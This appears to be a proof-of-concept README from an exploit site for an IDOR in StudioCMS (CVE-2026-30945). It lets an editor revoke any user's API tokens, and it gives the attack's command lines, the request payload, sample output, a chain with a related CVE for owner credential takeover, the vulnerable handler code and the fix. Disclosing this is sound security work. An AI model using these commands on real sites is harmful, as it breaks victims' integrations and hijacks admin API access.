Share
## https://sploitus.com/exploit?id=E950856F-799A-57E7-B819-242D8D96EC96
๐Ÿ—‘๏ธ CVE-2026-30945


  StudioCMS IDOR โ€” Arbitrary API Token Revocation Leading to Denial of Service



  
  
  
  



  NVD โ€ข
  Advisory โ€ข
  CWE-639


---

## Overview

The `DELETE /studiocms_api/dashboard/api-tokens` endpoint in **StudioCMS โ‰ค 0.3.0** allows any authenticated user with `editor` privileges or above to revoke API tokens belonging to **any other user**, including `admin` and `owner` accounts.

The handler accepts `tokenID` and `userID` directly from the request payload without verifying token ownership, caller identity, or role hierarchy. This enables **targeted denial of service** against critical integrations and automations.

> **Related:** This vulnerability shares the same root cause as [CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944) (token generation IDOR). When chained together, an attacker can revoke legitimate tokens and generate new ones, achieving complete API credential takeover.

### Attack Flow

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”   DELETE /api-tokens        โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚              โ”‚  {"tokenID":"",          โ”‚              โ”‚
โ”‚   Attacker   โ”‚   "userID":""}     โ”‚  StudioCMS   โ”‚
โ”‚   (Editor)   โ”‚ โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ–บ โ”‚   Server     โ”‚
โ”‚              โ”‚                              โ”‚              โ”‚
โ”‚              โ”‚ โ—„โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ”‚              โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜  {"message":"Token deleted"} โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                                                     โ”‚
                                                     โ–ผ
                                              โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
                                              โ”‚  Owner's     โ”‚
                                              โ”‚  CI/CD       โ”‚
                                              โ”‚  Pipeline    โ”‚โ”€โ”€โ–บ โŒ 401 Unauthorized
                                              โ”‚  Integration โ”‚โ”€โ”€โ–บ โŒ API Access Lost
                                              โ”‚  Monitoring  โ”‚โ”€โ”€โ–บ โŒ Silent Failure
                                              โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

### Vulnerability Details

| Field | Value |
|---|---|
| **CVE** | [CVE-2026-30945](https://nvd.nist.gov/vuln/detail/CVE-2026-30945) |
| **GHSA** | [GHSA-8rgj-vrfr-6hqr](https://github.com/withstudiocms/studiocms/security/advisories/GHSA-8rgj-vrfr-6hqr) |
| **CVSS v3.1** | **7.1** (High) โ€” `AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H` |
| **CWE** | CWE-639: Authorization Bypass Through User-Controlled Key |
| **CWE (secondary)** | CWE-863: Incorrect Authorization |
| **MITRE ATT&CK** | T1531 โ€” Account Access Removal |
| **OWASP API** | API1:2023 โ€” Broken Object Level Authorization |
| **Affected** | `studiocms โ‰ค 0.3.0` |
| **Fixed in** | `studiocms 0.4.0` |

---

## Contents

| File | Description |
|---|---|
| `cve_2026_30945_poc.py` | Python exploitation script with manual & automated modes |
| `README.md` | This file |
| `LICENSE` | MIT License |

---

## Prerequisites

- **StudioCMS โ‰ค 0.3.0** (vulnerable version)
- Python 3.8+
- Valid credentials for at least an `Editor` account
- A known token record UUID (internal ID, not the JWT)

```bash
pip install requests colorama
```

---

## Quick Start

### Manual Exploitation

```bash
# Revoke a specific token belonging to the owner
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

# Chain with CVE-2026-30944: create a token for the target first
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1

# Save results to JSON
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc \
  --save
```

### Automated Testing

```bash
# Test with multiple roles
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --editor-user editor01 \
  --editor-pass editorpass \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc
```

---

## Arguments

### Required

| Argument | Description |
|---|---|
| `-u, --url` | Target StudioCMS base URL |
| `--target-uuid` | Target user UUID whose token will be revoked |

### Optional

| Argument | Description |
|---|---|
| `--token-id` | Internal token record UUID to revoke (not the JWT). If omitted, the script will attempt to create a token first via CVE-2026-30944 |

### Manual Mode

| Argument | Description |
|---|---|
| `--username` | Username for authentication |
| `--password` | Password for authentication |

### Automated Test Mode

| Argument | Description |
|---|---|
| `--auto-test` | Enable automated multi-role testing |
| `--editor-user` | Editor account username |
| `--editor-pass` | Editor account password |
| `--visitor-user` | Visitor account username |
| `--visitor-pass` | Visitor account password |

### Flags

| Argument | Description |
|---|---|
| `--save` | Save results to JSON file |
| `--no-ssl-verify` | Disable SSL certificate verification |

---

## Example Output

### Vulnerable System

```
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  PHASE 1: Authentication
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  [+] Authenticated as 'editor01'
  [*] Session user: editor01 (editor)
  [*] Session UUID: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c

  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  PHASE 3: Token Revocation (IDOR)
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  [*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] Token ID:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] Revoking target's API token...
  [+] Token revoked! Server response: Token deleted
  [!] VULNERABILITY CONFIRMED โ€” Token successfully revoked!
  [!] Target user's API integrations are now broken (DoS)
```

### Patched System

```
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  PHASE 3: Token Revocation (IDOR)
  โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
  [*] Target UUID: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] Token ID:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] Revoking target's API token...
  [*] Access denied (403 Forbidden) โ€” endpoint may be patched
  [-] Revocation failed: Access denied (403 Forbidden)
```

---

## Attack Chain (CVE-2026-30944 + CVE-2026-30945)

When combined with the token generation IDOR ([CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944)), an attacker can perform a complete API credential takeover:

```
Step 1: Revoke owner's legitimate token    (CVE-2026-30945)
   โ””โ”€โ”€โ–บ Owner's CI/CD pipelines break silently

Step 2: Generate new token for owner       (CVE-2026-30944)
   โ””โ”€โ”€โ–บ Attacker now has owner-level API access

Step 3: Owner creates a new token to fix
   โ””โ”€โ”€โ–บ Attacker revokes it again (persistent DoS)
```

This creates a scenario where the attacker maintains persistent control over the owner's API access, repeatedly revoking any new tokens the owner creates while maintaining their own illegitimate access.

---

## Root Cause

The vulnerable handler at `packages/studiocms/frontend/pages/studiocms_api/dashboard/api-tokens.ts` (lines 58โ€“99) accepts `tokenID` and `userID` from the request body and passes them directly to the deletion function without any authorization checks:

```typescript
// [1] Only checks if caller is editor โ€” not WHO they're deleting tokens for
const isAuthorized = ctx.locals.StudioCMS.security?.userPermissionLevel.isEditor;

// [2] Both values from request body โ€” no validation against session
const jsonData = yield* readAPIContextJson(ctx);

// [3] Passed directly to destructive operation โ€” IDOR
yield* sdk.REST_API.tokens.delete({ tokenId: jsonData.tokenID, userId: jsonData.userID });
```

The handler has **five distinct flaws**: insufficient permission gate, no token ownership validation, missing caller identity check, no role hierarchy enforcement, and direct pass-through of user-controlled values to a destructive operation.

---

## Impact

- **Denial of Service** โ€” API tokens used in CI/CD pipelines, third-party integrations, or monitoring systems can be silently revoked
- **Selective sabotage** โ€” An editor can surgically revoke tokens from specific admins or owners
- **No audit trail** โ€” Revocation is processed as a legitimate operation, making attribution difficult
- **Persistent DoS when chained** โ€” Combined with CVE-2026-30944, attacker can repeatedly revoke any new tokens the victim creates

---

## Mitigation

Update StudioCMS to version **0.4.0** or later:

```bash
npm install studiocms@latest
```

---

## Legal Disclaimer

**This tool is provided for educational and authorized security testing purposes only.**

- Only use against systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal in most jurisdictions
- The author assumes no liability for misuse of this tool
- Always follow responsible disclosure practices

---

## References

- **CVE:** [CVE-2026-30945](https://nvd.nist.gov/vuln/detail/CVE-2026-30945)
- **Advisory:** [GHSA-8rgj-vrfr-6hqr](https://github.com/withstudiocms/studiocms/security/advisories/GHSA-8rgj-vrfr-6hqr)
- **Related CVE:** [CVE-2026-30944](https://nvd.nist.gov/vuln/detail/CVE-2026-30944) (Token generation IDOR)
- **CWE:** [CWE-639 โ€” Authorization Bypass Through User-Controlled Key](https://cwe.mitre.org/data/definitions/639.html)
- **OWASP:** [API1:2023 โ€” Broken Object Level Authorization](https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/)
- **MITRE ATT&CK:** [T1531 โ€” Account Access Removal](https://attack.mitre.org/techniques/T1531/)

---

## Author

**Filipe Gaudard**

---

## License

This PoC is released under the [MIT License](LICENSE) for educational purposes. Use responsibly and ethically.